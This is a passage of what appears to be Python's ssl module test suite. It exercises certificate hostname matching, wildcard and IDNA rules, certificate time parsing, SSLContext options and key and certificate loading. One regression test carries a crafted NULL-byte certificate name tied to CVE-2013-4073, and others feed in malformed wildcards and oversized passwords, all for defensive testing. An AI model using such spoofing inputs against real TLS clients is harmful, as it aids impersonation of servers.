fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# a wildcard in the first fragment combined with IDNA A-labels in subsequent
# fragments is not supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if hasattr(socket, 'AF_INET6'):
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if hasattr(socket, 'AF_INET6'):
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
